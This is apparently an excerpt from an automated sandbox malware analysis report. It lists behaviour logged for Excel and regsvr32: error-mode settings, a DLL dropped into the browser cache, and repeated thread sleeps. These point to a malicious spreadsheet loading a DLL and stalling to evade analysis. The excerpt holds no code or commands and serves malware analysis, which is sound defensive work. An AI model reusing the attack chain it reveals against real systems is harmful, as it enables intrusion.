                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 203 > 30Jump to behavior